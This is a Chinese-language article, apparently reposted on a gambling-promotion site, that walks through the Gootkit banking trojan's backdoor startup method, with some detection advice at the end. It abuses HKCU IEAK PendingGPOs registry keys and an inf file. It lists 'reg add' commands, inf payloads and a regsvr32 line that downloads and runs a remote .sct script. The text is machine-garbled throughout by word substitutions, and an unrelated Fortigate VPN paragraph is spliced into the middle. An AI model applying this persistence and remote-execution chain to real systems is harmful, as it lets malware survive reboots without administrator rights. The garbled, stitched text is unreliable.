Gookit Banking Trojan中的后门应用剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Gookit Banking Trojan中的后门应用剖析

申博_安全防护 申博 79次浏览 已收录 0个评论

0x00 媒介

Gootkit Banking Trojan在2014年被初次发明,近来Daniel Bunce(@ 0verfl0w_)引见了一些关于Gootkit Banking Trojan的剖析,文章地点以下:

https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/

个中,Gootkit Banking Trojan运用的后门启动要领是独占的,所以本文仅在技术研究的角度复现Gootkit Banking Trojan运用的后门启动要领,剖析应用思绪,给出防备和检测的发起。

0x01 简介

本文将要引见以下内容:

· 道理引见

· inf文件的基础知识

· 复现后门启动要领

· 剖析应用要领

· 检测和防备发起

0x02 道理引见

explorer.exe在运转时会加载特定的组策略对象(GPO),个中包括Internet Explorer Administration Kit(IEAK)的GPO。

假如经由过程增加注册表的体式格局为IKAK建立一个Pending GPO,指向一个inf文件,那末在explorer.exe启动时,就会加载这个Pending GPO,实行inf文件中的内容。

这个要领的长处是不须要管理员权限。

0x03 inf文件的基础知识

inf全称Device INFormation File,是Microsoft为硬件装备制造商宣布其驱动顺序推出的一种文件花样。

对大小写不敏感。

文件花样:

由多个节构成,节名用方括号括起来。

值得注意的节:

1.Version节

inf文件都包括这个节,用来形貌支撑的装备范例和实用的操作体系。

signature=”$CHICAGO$示意该inf文件实用于Windows98以后的一切操作体系。

signature=”$Windows NT$”示意该inf文件实用于Windows 2000/XP/2003操作体系。

2.DefaultInstall节

默许情况下起首实行该节内的内容,一般包括文件拷贝、删除,注册表键值的更新,子键删除等功能,还支撑实行敕令:

· RunPreSetupCommands,本节中指定的敕令在装置效劳设置文件之前运转

· RunPostSetupCommands,本节中指定的敕令在装置顺序完成效劳设置文件后运转

· RunPreUnInstCommands,本节中指定的敕令在卸载顺序最先之前运转

· RunPostUnInstCommands,本节中指定的敕令在卸载顺序运转后运转

参考资料:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc939869(v=technet.10)#information-inf-file-entries

Fortigate SSL VPN从漏洞挖掘到漏洞利用分析

上个月,我们发布了Palo Alto Networks GlobalProtect RCE作为一个预热,现在这篇文章将是我们的主要研究成果,如果你不能去Black Hat或DEFCON参加我们的演讲,可以学习下面的PPT! · 像NSA一样渗透企业内部网:在SSL VPN主流 厂商的VPN上进行RCE漏洞利用 0x00 研究调查 故事始于去年8月,当时我们开始了一个关于SSL VPN的新研究项目。与站点到站点VPN(如IPSEC和PPTP)相比,SSL VPN更易于使用,并且可与任何网络环境兼容,SSL VPN成为企业最流行的远程访问方式!

比方一个离别实行cmd敕令和弹出计算器的test.inf文件示例:

[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5,"advpack.dll"
[DefaultInstall]
RunPreSetupCommands=Command1
RunPostSetupCommands=Command2
[Command1]
C:\WINDOWS\SYSTEM32\calc.exe
[Command2]
C:\WINDOWS\SYSTEM32\cmd.exe

敕令行下的启动体式格局:

rundll32.exe advpack.dll,LaunchINFSection test.inf,DefaultInstall

实行后先弹出计算器,封闭计算器后,再弹出cmd.exe。

0x04 后门启动要领复现

1.运用测试顺序putty.exe,保留位置: c:\test\putty.exe

2.新建putty.inf,内容以下:

[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5,"You need a new version of advpack.dll"

[DefaultInstall]
RunPreSetupCommands=Command1:2
[Command1]
c:\test\putty.exe

3.新建注册表项

· HKEY_CURRENT_USER\Software\Microsoft\Ieak\GroupPolicy\PendingGPOs,Count, REG_DWORD,1

· HKEY_CURRENT_USER\Software\Microsoft\Ieak\GroupPolicy\PendingGPOs,Path1,REG_SZ,”c:\test\test.inf”

· HKEY_CURRENT_USER\Software\Microsoft\Ieak\GroupPolicy\PendingGPOs,Section1,REG_SZ,”DefaultInstall”

注:原文中Section1的值为[DefaultInstall],经测试,此处存在bug,准确的值应该为DefaultInstall。

注册表设置以下图:

Gookit Banking Trojan中的后门应用剖析

4.重启体系

体系启动后实行putty.exe,复现胜利。

注:体系重启后该注册表会被消灭,为了保证下次重启体系时再次触发后门,须要再次修正注册表,增加对应的键值,可供参考的cmd敕令以下:

reg add hkcu\SOFTWARE\Microsoft\IEAK\GroupPolicy\PendingGPOs /v Count /t REG_DWORD /d 1
reg add hkcu\SOFTWARE\Microsoft\IEAK\GroupPolicy\PendingGPOs /v Path1 /t REG_SZ /d "c:\test\test.inf"
reg add hkcu\SOFTWARE\Microsoft\IEAK\GroupPolicy\PendingGPOs /v Section1 /t REG_SZ /d "DefaultInstall"

0x05 要领优化

1.inf文件不须要同要启动的exe文件同名

inf文件名称能够恣意,比方test.inf

注:原文形貌须要inf文件同exe文件同名。

2.inf文件内容花样不牢固

AdvancedINF=2.5,”You need a new version of advpack.dll”可修正为AdvancedINF=2.5,”11111111″

3.inf文件的payload不唯一

还能够完成文件拷贝、删除,注册表键值的更新,子键删除等功能。

假如是实行敕令,能够同sct连系完成无文件落地,比方完成长途下载实行的文件内容以下:

[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5,"advpack.dll"
[DefaultInstall]
RunPreSetupCommands=Command1
[Command1]
regsvr32 /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll

0x06 应用剖析

长处以下:1.不须要管理员权限,只须要普通用户权限即可 2.payload扩展性高,同其他要领连系(如sct)可完成长途下载实行,不须要向硬盘写入文件。

0x07 检测和防备发起

监控注册表位置:HKEY_CURRENT_USER\Software\Microsoft\Ieak\GroupPolicy\PendingGPOs

默许设置下,体系不存在注册表项:HKEY_CURRENT_USER\Software\Microsoft\Ieak\GroupPolicy

注:修正注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Ieak\GroupPolicy\PendingGPOs不会触发这个后门。

0x08 小结

本文复现了Gookit Banking Trojan中的后门启动要领,剖析应用思绪,给出防备和检测的发起。

原文地点: https://www.4hou.com/technology/20289.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Gookit Banking Trojan中的后门应用剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址